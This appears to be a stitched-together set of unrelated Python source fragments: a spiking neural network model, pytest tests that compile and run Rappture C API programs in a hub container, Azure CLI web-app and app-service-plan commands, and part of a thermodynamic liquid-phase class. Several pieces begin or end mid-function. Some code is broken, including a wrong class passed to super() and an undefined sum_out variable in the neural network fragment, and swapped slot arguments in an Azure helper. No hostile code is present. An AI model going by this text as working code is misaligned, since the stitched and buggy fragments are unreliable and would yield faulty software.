# r_stdp(self.monitor_GC_m[0],self.monitor_PCE_m[0],self.m_PCE.weight[:,0:self.num_out_GC], reward,lr=lr)
# r_stdp(self.monitor_GC_u[0],self.monitor_PCE_m[0],self.m_PCE.weight[:,self.num_out_GC:2*self.num_out_GC], reward,lr=lr)
# r_stdp(self.monitor_GC_sigma[0],self.monitor_PCE_m[0],self.m_PCE.weight[:,2*self.num_out_GC:3*self.num_out_GC], reward,lr=lr)
# r_stdp(self.monitor_GC_f[0],self.monitor_PCE_m[0],self.m_PCE.weight[:,3*self.num_out_GC:4*self.num_out_GC], reward,lr=lr)
# r_stdp(self.monitor_GC_m[0],self.monitor_PCI_m[0],self.m_PCI.weight[:,0:self.num_out_GC], reward,lr=lr)
# r_stdp(self.monitor_GC_u[0],self.monitor_PCI_m[0],self.m_PCI.weight[:,self.num_out_GC:2*self.num_out_GC], reward,lr=lr)
# r_stdp(self.monitor_GC_sigma[0],self.monitor_PCI_m[0],self.m_PCI.weight[:,2*self.num_out_GC:3*self.num_out_GC], reward,lr=lr)
# r_stdp(self.monitor_GC_f[0],self.monitor_PCI_m[0],self.m_PCI.weight[:,3*self.num_out_GC:4*self.num_out_GC], reward,lr=lr)
############################################
##############prefrontal model##############
class prefrontal_model_FF(nn.Module):
def __init__(self, batch_size, num_hidden,N_step,possion_num=50,gpu='0'):
super(prefrontal_model, self).__init__()
self.batch_size = batch_size
self.num_hidden = num_hidden
self.inputnum = 16*4
self.output = 4
self.possion_num = possion_num
self.device = torch.device("cuda:"+gpu if torch.cuda.is_available() else "cpu")
#layer
self.fc1 = nn.Linear(self.inputnum, self.num_hidden, bias = if_bias)
self.fc2 = nn.Linear(self.num_hidden, 2*self.num_hidden, bias = if_bias)
self.fc3 = nn.Linear(2*self.num_hidden, self.num_hidden, bias = if_bias)
self.fc4 = nn.Linear(self.num_hidden, self.num_hidden, bias = if_bias)
self.fc5 = nn.Linear(self.num_hidden, self.output, bias = if_bias)
#monitor
self.monitor_h1 = torch.zeros(self.batch_size, self.num_hidden, self.possion_num).to(self.device)
def forward(self,input, time_window):
h1_mem = h1_spike = h1_sumspike = torch.zeros(self.batch_size, self.num_hidden).to(self.device)
h2_mem = h2_spike = h2_sumspike = torch.zeros(self.batch_size, 2*self.num_hidden).to(self.device)
h3_mem = h3_spike = h3_sumspike = torch.zeros(self.batch_size, self.num_hidden).to(self.device)
h4_mem = h4_spike = h4_sumspike = torch.zeros(self.batch_size, self.num_hidden).to(self.device)
h5_mem = h5_spike = h5_sumspike = torch.zeros(self.batch_size, self.output).to(self.device)
for step in range(time_window):
sum_out1 = None
sum_out2 = None
sum_out3 = None
#x = x.view(self.batch_size, -1)
for t in range(time_window):
#get signal
#x_t = torch.from_numpy(x[:,t]).float().cuda()
input_t = input[:,t].float()
input_t = input_t.view(self.batch_size, -1)
#layer forward
h1_mem, h1_spike = mem_update(self.fc1, input_t, h1_mem, h1_spike)
#h1_sumspike += h1_spike
h2_mem, h2_spike = mem_update(self.fc2, h1_spike, h2_mem, h2_spike)
#h2_sumspike += h2_spike
h3_mem, h3_spike = mem_update(self.fc3, h2_spike, h3_mem, h3_spike)
#h3_sumspike += h3_spike
h4_mem, h4_spike = mem_update(self.fc4, h3_spike, h4_mem, h4_spike)
#h4_sumspike += h4_spike
h5_mem, h5_spike = mem_update(self.fc5, h4_spike, h5_mem, h5_spike)
#h5_sumspike += h5_spike
sum_out = h5_spike if sum_out is None else sum_out + h5_spike
#outputs = h2_sumspike / time_window
return sum_out
class prefrontal_model(nn.Module):
def __init__(self, batch_size, num_hidden1, num_hidden2, num_hidden3,N_step,possion_num=50,gpu='0'):
super(prefrontal_model, self).__init__()
self.batch_size = batch_size
self.num_hidden1 = num_hidden1
self.num_hidden2 = num_hidden2
self.num_hidden3 = num_hidden3
self.inputnum = 16*4
self.output = 4
self.possion_num = possion_num
self.device = torch.device("cuda:"+gpu if torch.cuda.is_available() else "cpu")
#layer
self.fc1 = nn.Linear(self.inputnum, self.num_hidden1, bias = if_bias)
self.fc2 = nn.Linear(self.num_hidden1, self.num_hidden2, bias = if_bias)
self.fc3 = nn.Linear(self.num_hidden2, self.num_hidden2, bias = if_bias)
self.fc4 = nn.Linear(self.num_hidden2, self.num_hidden3, bias = if_bias)
self.fc5 = nn.Linear(self.num_hidden3, self.output, bias = if_bias)
def forward(self,input, time_window):
'''
input1: (f(x,t), f(y,t))
input2: (u(x,t+n), sigma(x,t+n), u(y,t+n), | |
<reponame>codedsk/hubcheck-hubzero-tests<gh_stars>1-10
import unittest
import sys
import os
import pytest
import re
from string import Template
import hubcheck
from hubcheck.testcase import TestCase2
from hubcheck.shell import ContainerManager
pytestmark = [ pytest.mark.container,
pytest.mark.rappture,
pytest.mark.weekly,
pytest.mark.reboot
]
SUB_SPACING = 12
TOOL_XML = """
<?xml version="1.0"?>
<run>
<tool>
<about>Press Simulate to view results.</about>
<command>@tool/fermi @driver</command>
</tool>
<input>
<number id="Ef">
<about>
<label>Fermi Level</label>
<description>Energy at center of distribution.</description>
</about>
<units>eV</units>
<min>-10eV</min>
<max>10eV</max>
<default>0.2556eV</default>
</number>
</input>
</run>
""".strip()
@pytest.mark.rappture_c
@pytest.mark.registereduser
@pytest.mark.usefixtures('rappture_version')
class TestContainerRapptureCApi(TestCase2):
def setup_method(self,method):
self.remove_files = []
# get user account info
self.username,self.userpass = self.testdata.find_account_for('registeredworkspace')
hubname = self.testdata.find_url_for('https')
# access a tool session container
cm = ContainerManager()
self.ws = cm.access(host=hubname,
username=self.username,
password=self.userpass)
self.ws.execute('cd $SESSIONDIR')
self.sessiondir,es = self.ws.execute('pwd')
def teardown_method(self,method):
# remove the executable and config files
for fname in self.remove_files:
self.ws.execute('rm -f %s' % (fname))
# exit the workspace
self.ws.close()
def write_xml_file(self):
# write xml file
xmlfn = os.path.join(self.sessiondir,"tool.xml")
self.ws.importfile(TOOL_XML,xmlfn,mode=0600,is_data=True)
self.remove_files.append(xmlfn)
def run_code(self,program,xmlfn='tool.xml'):
# write program
programfn = os.path.join(self.sessiondir,"program.c")
self.ws.importfile(program,programfn,mode=0600,is_data=True)
self.remove_files.append(programfn)
# generate path for compiled executable
compiledfn = os.path.join(self.sessiondir,'program')
self.remove_files.append(compiledfn)
# setup rappture environment
self.ws.execute('. /etc/environ.sh')
self.ws.execute('use -e -r %s' % (self.rappture_version))
# setup RAPPTURE_INCLUDE and RAPPTURE_LIB
rpflags = '-I$RAPPTURE_PATH/include'
rpflags += ' -L$RAPPTURE_PATH/lib -lrappture -lexpat -lz -lm'
# compile the code
command = 'gcc -o %s %s %s' % (compiledfn,rpflags,programfn)
self.ws.execute(command)
self.ws.execute('chmod 700 %s' % (compiledfn))
# run the code
command = '%s %s' % (compiledfn,xmlfn)
output,es = self.ws.execute(command,fail_on_exit_code=False)
return output,es
@pytest.mark.dsktest
def test_rpLibrary_valid_path(self):
"""
rpLibrary()
test the function using an xml file that exists on disk
"""
program = """
#include <stdio.h>
#include "rappture.h"
int main(int argc, char* argv[]) {
RpLibrary* lib = NULL;
int err = 1;
lib = rpLibrary(argv[1]);
if (lib != NULL) {
err = 0;
}
return err;
}
"""
self.write_xml_file()
output,es = self.run_code(program)
# check for success
assert es == 0, \
"rpLibrary failed to open xml file, es = %s" % (es)
@pytest.mark.skipif(True,reason="the rappture c api currently does not error on invalid path")
def test_rpLibrary_invalid_path(self):
"""
rpLibrary()
test the function using an xml file that does not exist on disk
"""
program = """
#include <stdio.h>
#include "rappture.h"
int main(int argc, char* argv[]) {
RpLibrary* lib = NULL;
int err = 0;
lib = rpLibrary(argv[1]);
if (lib == NULL) {
err = 1;
}
return err;
}
"""
xmlfn = "tool_does_not_exist.xml"
output,es = self.run_code(program,xmlfn)
# check for success
assert es == 1, \
"rpLibrary successfully opened a file that does not exist: %s" \
% (xmlfn)
@pytest.mark.skipif(True,reason="the rappture c api currently does not error on blank path")
def test_rpLibrary_no_path(self):
"""
rpLibrary()
test the function without giving a filename
"""
program = """
#include <stdio.h>
#include "rappture.h"
int main(int argc, char* argv[]) {
RpLibrary* lib = NULL;
int err = 0;
lib = rpLibrary("");
if (lib == NULL) {
err = 1;
}
return err;
}
"""
output,es = self.run_code(program)
# check for success
assert es == 1, \
"rpLibrary initialized an object with blank filename"
def test_rpLibrary_null_path(self):
"""
rpLibrary()
test the function giving a NULL pointer
"""
program = """
#include <stdio.h>
#include "rappture.h"
int main(int argc, char* argv[]) {
RpLibrary* lib = NULL;
int err = 0;
lib = rpLibrary(NULL);
if (lib == NULL) {
err = 1;
}
return err;
}
"""
xmlfn = "tool_does_not_exist.xml"
output,es = self.run_code(program,xmlfn)
# check for success
assert es == 0, \
"rpLibrary failed to initialize an object with NULL filename"
def test_rpGetString_valid_path(self):
"""
rpGetString()
test the function with a valid xml path
"""
path = "input.number(Ef).about.label"
program = Template("""
#include <stdio.h>
#include "rappture.h"
int main(int argc, char* argv[]) {
RpLibrary* lib = NULL;
int err = 0;
const char* val = NULL;
lib = rpLibrary(argv[1]);
if (lib == NULL) {
err = 1;
return err;
}
err = rpGetString(lib,"$path",&val);
printf("%s",val);
return err;
}
""").substitute(path=path)
self.write_xml_file()
output,es = self.run_code(program)
# check for success
assert es == 0, \
'program exited with status %s while trying to call' % (es) \
+ ' rpGetString with xml path %s' % (path)
expected = 'Fermi Level'
assert output == expected, \
"rpGetString returned the wrong data, expected: %s, received: %s" \
% (expected,output)
@pytest.mark.skipif(True,reason="the rappture c api currently only returns 0 as an error code")
def test_rpGetString_invalid_path(self):
"""
rpGetString()
test that calling the function with an invalid xml path returns a
non zero error code.
"""
path = "input.number(Ef).bad.path"
program = Template("""
#include <stdio.h>
#include "rappture.h"
int main(int argc, char* argv[]) {
RpLibrary* lib = NULL;
int err = 0;
const char* val = NULL;
lib = rpLibrary(argv[1]);
if (lib == NULL) {
err = 1;
return err;
}
err = rpGetString(lib,"$path",&val);
if (err == 0) {
printf("%s",val);
}
return err;
}
""").substitute(path=path)
self.write_xml_file()
output,es = self.run_code(program)
# check for success
assert es == 1, \
'program exited with status %s while trying to call' % (es) \
+ ' rpGetString with bad xml path %s' % (path)
expected = ''
assert output == expected, \
"rpGetString returned the wrong data, expected: %s, received: %s" \
% (expected,output)
def test_rpGetString_null_retcstr(self):
"""
rpGetString()
test that calling the function with a NULL retCStr
non zero error code.
"""
path = "input.number(Ef).about.label"
program = Template("""
#include <stdio.h>
#include "rappture.h"
int main(int argc, char* argv[]) {
RpLibrary* lib = NULL;
int err = 0;
lib = rpLibrary(argv[1]);
if (lib == NULL) {
err = 1;
return err;
}
err = rpGetString(lib,"$path",NULL);
return err;
}
""").substitute(path=path)
self.write_xml_file()
output,es = self.run_code(program)
# check for segfault
assert es == 139, \
'program exited with status %s while trying to call' % (es) \
+ ' rpGetString with retCStr == NULL'
def test_rpGetDouble_valid_path(self):
"""
rpGetDouble()
test the function with a valid xml path
"""
path = "input.number(Ef).default"
program = Template("""
#include <stdio.h>
#include "rappture.h"
int main(int argc, char* argv[]) {
RpLibrary* lib = NULL;
int err = 0;
double val = 0.0;
lib = rpLibrary(argv[1]);
if (lib == NULL) {
err = 1;
return err;
}
err = rpGetDouble(lib,"$path",&val);
printf("%g",val);
return err;
}
""").substitute(path=path)
self.write_xml_file()
output,es = self.run_code(program)
# check for success
assert es == 0, \
'program exited with status %s while trying to call' % (es) \
+ ' rpGetDouble with xml path %s' % (path)
expected = '0.2556'
assert output == expected, \
"rpGetDouble returned the wrong data, expected: %s, received: %s" \
% (expected,output)
@pytest.mark.skipif(True,reason="the rappture c api currently only returns 0 as an error code")
def test_rpGetDouble_invalid_path(self):
"""
rpGetDouble()
test that calling the function with an invalid xml path returns a
non zero error code.
"""
path = "input.number(Ef).bad.path"
program = Template("""
#include <stdio.h>
#include "rappture.h"
int main(int argc, char* argv[]) {
RpLibrary* lib = NULL;
int err = 0;
double val = 0.0;
lib = rpLibrary(argv[1]);
if (lib == NULL) {
err = 1;
return err;
}
err = rpGetDouble(lib,"$path",&val);
if (err == 0) {
printf("%g",val);
}
return err;
}
""").substitute(path=path)
self.write_xml_file()
output,es = self.run_code(program)
# check for success
assert es != 0, \
'program exited with status %s while trying to call' % (es) \
+ ' rpGetDouble with bad xml path %s' % (path)
expected = '0.2556'
assert output == '', \
"rpGetDouble returned the wrong data, expected: %s, received: %s" \
% (expected,output)
def test_rpGetDouble_null_retdval(self):
"""
rpGetDouble()
test that calling the function with a NULL retDVal
returns a non zero error code.
"""
path = "input.number(Ef).default"
program = Template("""
#include <stdio.h>
#include "rappture.h"
int main(int argc, char* argv[]) {
RpLibrary* lib = NULL;
int err = 0;
lib = rpLibrary(argv[1]);
if (lib == NULL) {
err = 1;
return err;
}
err = rpGetDouble(lib,"$path",NULL);
return err;
}
""").substitute(path=path)
self.write_xml_file()
output,es = self.run_code(program)
# check for segfault
assert es == 139, \
'program exited with status %s while trying to call' % (es) \
+ ' rpGetDouble with retDVal == NULL'
def test_rpPutString_valid_path_valid_value(self):
"""
rpPutString()
test the function with a valid xml path and valid value
"""
path = "output.string.current"
val = "my new data"
program = Template("""
#include <stdio.h>
#include "rappture.h"
int | |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=no-self-use,too-many-arguments,too-many-lines
from __future__ import print_function
import json
import threading
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from azure.mgmt.web.models import (Site, SiteConfig, User, ServerFarmWithRichSku,
SkuDescription, SslState, HostNameBinding, SiteSourceControl)
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands.arm import is_valid_resource_id, parse_resource_id
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.prompting import prompt_pass, NoTTYException
import azure.cli.core.azlogging as azlogging
from azure.cli.core._util import CLIError
from ._params import web_client_factory, _generic_site_operation
logger = azlogging.get_az_logger(__name__)
#pylint:disable=no-member
#workaround that app service's error doesn't comform to LRO spec
class AppServiceLongRunningOperation(LongRunningOperation): #pylint: disable=too-few-public-methods
def __init__(self, creating_plan=False):
super(AppServiceLongRunningOperation, self).__init__(self)
self._creating_plan = creating_plan
def __call__(self, poller):
try:
return super(AppServiceLongRunningOperation, self).__call__(poller)
except Exception as ex:
raise self._get_detail_error(ex)
def _get_detail_error(self, ex):
try:
detail = json.loads(ex.response.text)['Message']
if self._creating_plan:
if 'Requested features are not supported in region' in detail:
detail = ("Plan with linux worker is not supported in current region. " +
"Run 'az appservice list-locations --linux-workers-enabled' " +
"to cross check")
elif 'Not enough available reserved instance servers to satisfy' in detail:
detail = ("Plan with Linux worker can only be created in a group " +
"which has never contained a Windows worker. Please use " +
"a new resource group. Original error:" + detail)
return CLIError(detail)
except: #pylint: disable=bare-except
return ex
def create_webapp(resource_group_name, name, plan):
client = web_client_factory()
if is_valid_resource_id(plan):
plan = parse_resource_id(plan)['name']
location = _get_location_from_app_service_plan(client, resource_group_name, plan)
webapp_def = Site(server_farm_id=plan, location=location)
poller = client.sites.create_or_update_site(resource_group_name, name, webapp_def)
return AppServiceLongRunningOperation()(poller)
def show_webapp(resource_group_name, name, slot=None):
webapp = _generic_site_operation(resource_group_name, name, 'get_site', slot)
return _rename_server_farm_props(webapp)
def list_webapp(resource_group_name):
client = web_client_factory()
result = client.sites.get_sites(resource_group_name)
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _rename_server_farm_props(webapp):
#Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_webapp(resource_group_name, name, slot=None):
return _generic_site_operation(resource_group_name, name, 'delete_site', slot)
def stop_webapp(resource_group_name, name, slot=None):
return _generic_site_operation(resource_group_name, name, 'stop_site', slot)
def start_webapp(resource_group_name, name, slot=None):
return _generic_site_operation(resource_group_name, name, 'start_site', slot)
def restart_webapp(resource_group_name, name, slot=None):
return _generic_site_operation(resource_group_name, name, 'restart_site', slot)
def get_site_configs(resource_group_name, name, slot=None):
return _generic_site_operation(resource_group_name, name, 'get_site_config', slot)
def get_app_settings(resource_group_name, name, slot=None):
result = _generic_site_operation(resource_group_name, name, 'list_site_app_settings', slot)
return result.properties
#for any modifications to the non-optional parameters, adjust the reflection logic accordingly
#in the method
def update_site_configs(resource_group_name, name, slot=None,
php_version=None, python_version=None,#pylint: disable=unused-argument
node_version=None, net_framework_version=None, #pylint: disable=unused-argument
java_version=None, java_container=None, java_container_version=None,#pylint: disable=unused-argument
remote_debugging_enabled=None, web_sockets_enabled=None,#pylint: disable=unused-argument
always_on=None, auto_heal_enabled=None,#pylint: disable=unused-argument
use32_bit_worker_process=None,#pylint: disable=unused-argument
app_command_line=None):#pylint: disable=unused-argument
configs = get_site_configs(resource_group_name, name, slot)
import inspect
frame = inspect.currentframe()
#note: getargvalues is used already in azure.cli.core.commands.
#and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) #pylint: disable=deprecated-method
for arg in args[3:]:
if arg is not None:
setattr(configs, arg, values[arg])
return _generic_site_operation(resource_group_name, name, 'update_site_config', slot, configs)
def update_app_settings(resource_group_name, name, settings, slot=None):
app_settings = _generic_site_operation(resource_group_name, name,
'list_site_app_settings', slot)
for name_value in settings:
#split at the first '=', appsetting should not have '=' in the name
settings_name, value = name_value.split('=', 1)
app_settings.properties[settings_name] = value
result = _generic_site_operation(resource_group_name, name, 'update_site_app_settings',
slot, app_settings)
return result.properties
def delete_app_settings(resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(resource_group_name, name,
'list_site_app_settings', slot)
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
return _generic_site_operation(resource_group_name, name, 'update_site_app_settings',
slot, app_settings)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', 'DOCKER_CUSTOM_IMAGE_NAME']
def update_container_settings(resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if docker_custom_image_name is not None:
settings.append('DOCKER_CUSTOM_IMAGE_NAME=' + docker_custom_image_name)
settings = update_app_settings(resource_group_name, name, settings, slot)
return _filter_for_container_settings(settings)
def delete_container_settings(resource_group_name, name, slot=None):
delete_app_settings(resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(resource_group_name, name, slot=None):
settings = get_app_settings(resource_group_name, name, slot)
return _filter_for_container_settings(settings)
def _filter_for_container_settings(settings):
return {x: settings[x] for x in settings if x in CONTAINER_APPSETTING_NAMES}
def add_hostname(resource_group_name, webapp, name, slot=None):
client = web_client_factory()
webapp = client.sites.get_site(resource_group_name, webapp)
binding = HostNameBinding(webapp.location, host_name_binding_name=name, site_name=webapp)
if slot is None:
return client.sites.create_or_update_site_host_name_binding(resource_group_name, webapp,
name, binding)
else:
return client.sites.create_or_update_site_host_name_binding_slot(resource_group_name,
webapp, name,
binding, slot)
def delete_hostname(resource_group_name, webapp, name, slot=None):
client = web_client_factory()
if slot is None:
return client.sites.delete_site_host_name_binding(resource_group_name, webapp, name)
else:
return client.sites.delete_site_host_name_binding_slot(resource_group_name,
webapp, slot, name)
def list_hostnames(resource_group_name, webapp, slot=None):
return _generic_site_operation(resource_group_name, webapp, 'get_site_host_name_bindings',
slot)
#TODO: figure out the 'configuration_source' and add related param descriptions
def create_webapp_slot(resource_group_name, webapp, slot, configuration_source=None):
client = web_client_factory()
site = client.sites.get_site(resource_group_name, webapp)
location = site.location
if configuration_source is None:
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
elif configuration_source.lower() == webapp.lower(): #clone from production
slot_def = site #pylint: disable=redefined-variable-type
else: # from other slot
slot_def = client.sites.get_site_slot(resource_group_name, webapp, slot)
poller = client.sites.create_or_update_site_slot(resource_group_name, webapp, slot_def, slot)
return AppServiceLongRunningOperation()(poller)
def config_source_control(resource_group_name, name, repo_url, repository_type=None, branch=None,
manual_integration=None, slot=None):
client = web_client_factory()
location = _get_location_from_webapp(client, resource_group_name, name)
source_control = SiteSourceControl(location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'))
return _generic_site_operation(resource_group_name, name,
'create_or_update_site_source_control',
slot, source_control)
def show_source_control(resource_group_name, name, slot=None):
return _generic_site_operation(resource_group_name, name, 'get_site_source_control', slot)
def delete_source_control(resource_group_name, name, slot=None):
return _generic_site_operation(resource_group_name, name, 'delete_site_source_control', slot)
def enable_local_git(resource_group_name, name, slot=None):
client = web_client_factory()
location = _get_location_from_webapp(client, resource_group_name, name)
site_config = SiteConfig(location)
site_config.scm_type = 'LocalGit'
if slot is None:
client.sites.create_or_update_site_config(resource_group_name, name, site_config)
else:
client.sites.create_or_update_site_config_slot(resource_group_name, name, site_config, slot)
return {'url' : _get_local_git_url(client, resource_group_name, name, slot)}
def sync_site_repo(resource_group_name, name, slot=None):
return _generic_site_operation(resource_group_name, name, 'sync_site_repository',
slot)
def list_app_service_plans(resource_group_name=None):
client = web_client_factory()
if resource_group_name is None:
return client.global_model.get_all_server_farms()
else:
return client.server_farms.get_server_farms(resource_group_name)
def create_app_service_plan(resource_group_name, name, is_linux, sku='B1', number_of_workers=None,
location=None):
client = web_client_factory()
sku = _normalize_sku(sku)
if location is None:
location = _get_location_from_resource_group(resource_group_name)
#the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=_get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = ServerFarmWithRichSku(location, server_farm_with_rich_sku_name=name,
sku=sku_def, reserved=(is_linux or None))
poller = client.server_farms.create_or_update_server_farm(resource_group_name, name, plan_def)
return AppServiceLongRunningOperation(creating_plan=True)(poller)
def update_app_service_plan(instance, sku=None, number_of_workers=None,
admin_site_name=None):
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = _get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
if admin_site_name is not None:
instance.admin_site_name = admin_site_name
return instance
def _normalize_sku(sku):
sku = sku.upper()
if sku == 'FREE':
return 'F1'
elif sku == 'SHARED':
return 'D1'
else:
return sku
def _get_sku_name(tier):
tier = tier.upper()
if tier == 'F1':
return 'FREE'
elif tier == 'D1':
return 'SHARED'
elif tier in ['B1', 'B2', 'B3']:
return 'BASIC'
elif tier in ['S1', 'S2', 'S3']:
return 'STANDARD'
elif tier in ['P1', 'P2', 'P3']:
return 'PREMIUM'
else:
raise CLIError("Invalid sku(pricing tier), please refer to command help for valid values")
def _get_location_from_resource_group(resource_group_name):
from azure.mgmt.resource.resources import ResourceManagementClient
client = get_mgmt_service_client(ResourceManagementClient)
group = client.resource_groups.get(resource_group_name)
return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.sites.get_site(resource_group_name, webapp)
return webapp.location
def _get_location_from_app_service_plan(client, resource_group_name, plan):
plan = client.server_farms.get_server_farm(resource_group_name, plan)
return plan.location
def _get_local_git_url(client, resource_group_name, name, slot=None):
user = client.provider.get_publishing_user()
result = _generic_site_operation(resource_group_name, name, 'get_site_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(client, resource_group_name, name, slot=None):
if slot is None:
poller = client.sites.list_site_publishing_credentials(resource_group_name, name,
slot)
else:
poller = client.sites.list_site_publishing_credentials_slot(resource_group_name, name)
result = poller.result()
return result.scm_uri
def set_deployment_user(user_name, password=None):
'''
Update deployment credentials.(Note, all webapps in your subscription will be impacted)
'''
client = web_client_factory()
user = User(location='not-really-needed') #TODO: open bug for this one is not needed
user.publishing_user_name = user_name
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
result = client.provider.update_publishing_user(user)
return result
def view_in_browser(resource_group_name, name, slot=None):
import webbrowser
site = _generic_site_operation(resource_group_name, name, 'get_site', slot)
url = site.default_host_name
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
url = ('https' if ssl_host else 'http') + '://' + url
webbrowser.open(url, new=2) # 2 means: open in a new tab, if possible
#TODO: expose new blob suport
def config_diagnostics(resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
detailed_error_messages=None, failed_request_tracing=None,
slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
SiteLogsConfig, HttpLogsConfig,
FileSystemHttpLogsConfig, EnabledConfig)
client = web_client_factory()
#TODO: ensure we call get_site only once
site = client.sites.get_site(resource_group_name, name)
location = site.location
application_logs = None
if application_logging is not None:
if not application_logging:
level = 'Off'
elif level is None:
level = 'Error'
fs_log = FileSystemApplicationLogsConfig(level)
application_logs = ApplicationLogsConfig(fs_log)
http_logs = None
if web_server_logging is not None:
enabled = web_server_logging
#100 mb max log size, retenting last 3 days. Yes we hard code it, portal does too
fs_server_log = FileSystemHttpLogsConfig(100, 3, enabled)
http_logs = HttpLogsConfig(fs_server_log)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(failed_request_tracing))
site_log_config = SiteLogsConfig(location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(resource_group_name, name, 'update_site_logs_config',
slot, site_log_config)
def config_slot_auto_swap(resource_group_name, | |
IdealSolution) and not self.has_henry_components
self.Hfs = Hfs
self.Gfs = Gfs
self.Sfs = Sfs
if T is not None and P is not None and zs is not None:
self.T = T
self.P = P
self.zs = zs
def to_TP_zs(self, T, P, zs):
T_equal = hasattr(self, 'T') and T == self.T
new = self.__class__.__new__(self.__class__)
new.T = T
new.P = P
new.zs = zs
new.N = self.N
new.cmps = self.cmps
self.transfer_data(new, zs, T, T_equal)
return new
def to(self, zs, T=None, P=None, V=None):
try:
T_equal = T == self.T
except:
T_equal = False
new = self.__class__.__new__(self.__class__)
new.zs = zs
new.N = self.N
new.cmps = self.cmps
if T is not None:
if P is not None:
new.T = T
new.P = P
elif V is not None:
def to_solve(P):
return self.to_TP_zs(T, P, zs).V() - V
P = secant(to_solve, 0.0002, xtol=1e-8, ytol=1e-10)
new.P = P
elif P is not None and V is not None:
def to_solve(T):
return self.to_TP_zs(T, P, zs).V() - V
T = secant(to_solve, 300, xtol=1e-9, ytol=1e-5)
new.T = T
else:
raise ValueError("Two of T, P, or V are needed")
self.transfer_data(new, zs, T, T_equal)
return new
def transfer_data(self, new, zs, T, T_equal):
new.VaporPressures = self.VaporPressures
new.VolumeLiquids = self.VolumeLiquids
new.eos_pure_instances = self.eos_pure_instances
new.HeatCapacityGases = self.HeatCapacityGases
new.EnthalpyVaporizations = self.EnthalpyVaporizations
new.HeatCapacityLiquids = self.HeatCapacityLiquids
new.Psats_locked = self.Psats_locked
new._Psats_data = self._Psats_data
new.Cpgs_locked = self.Cpgs_locked
new._Cpgs_data = self._Cpgs_data
new.Cpls_locked = self.Cpls_locked
new._Cpls_data = self._Cpls_data
new.Vms_sat_locked = self.Vms_sat_locked
new._Vms_sat_data = self._Vms_sat_data
new._Hvap_data = self._Hvap_data
new.Hvap_locked = self.Hvap_locked
new.incompressible = self.incompressible
new.use_phis_sat = self.use_phis_sat
new.use_Poynting = self.use_Poynting
new.P_DEPENDENT_H_LIQ = self.P_DEPENDENT_H_LIQ
new.use_IG_Cp = self.use_IG_Cp
new.use_eos_volume = self.use_eos_volume
new.Hfs = self.Hfs
new.Gfs = self.Gfs
new.Sfs = self.Sfs
new.henry_data = self.henry_data
new.henry_components = self.henry_components
new.has_henry_components = self.has_henry_components
new.composition_independent = self.composition_independent
new.use_Tait = self.use_Tait
new._Tait_B_data = self._Tait_B_data
new._Tait_C_data = self._Tait_C_data
if T_equal and (self.composition_independent or self.zs is zs):
# Allow the composition inconsistency as it is harmless
new.GibbsExcessModel = self.GibbsExcessModel
else:
new.GibbsExcessModel = self.GibbsExcessModel.to_T_xs(T=T, xs=zs)
try:
if T_equal:
if not self.has_henry_components:
try:
new._Psats = self._Psats
new._dPsats_dT = self._dPsats_dT
new._d2Psats_dT2 = self._d2Psats_dT2
except:
pass
try:
new._Vms_sat = self._Vms_sat
new._Vms_sat_dT = self._Vms_sat_dT
new._d2Vms_sat_dT2 = self._d2Vms_sat_dT2
except:
pass
try:
new._Cpigs = self._Cpigs
except:
pass
try:
new._Cpig_integrals_over_T_pure = self._Cpig_integrals_over_T_pure
except:
pass
try:
new._Cpig_integrals_pure = self._Cpig_integrals_pure
except:
pass
except:
pass
return new
def Henry_matrix(self):
'''Generate a matrix of all component-solvent Henry's law values
Shape N*N; solvent/solvent and gas/gas values are all None, as well
as solvent/gas values where the parameters are unavailable.
'''
def Henry_constants(self):
'''Mix the parameters in `Henry_matrix` into values to take the place
in Psats.
'''
def Psats_T_ref(self):
try:
return self._Psats_T_ref
except AttributeError:
pass
VaporPressures, cmps = self.VaporPressures, self.cmps
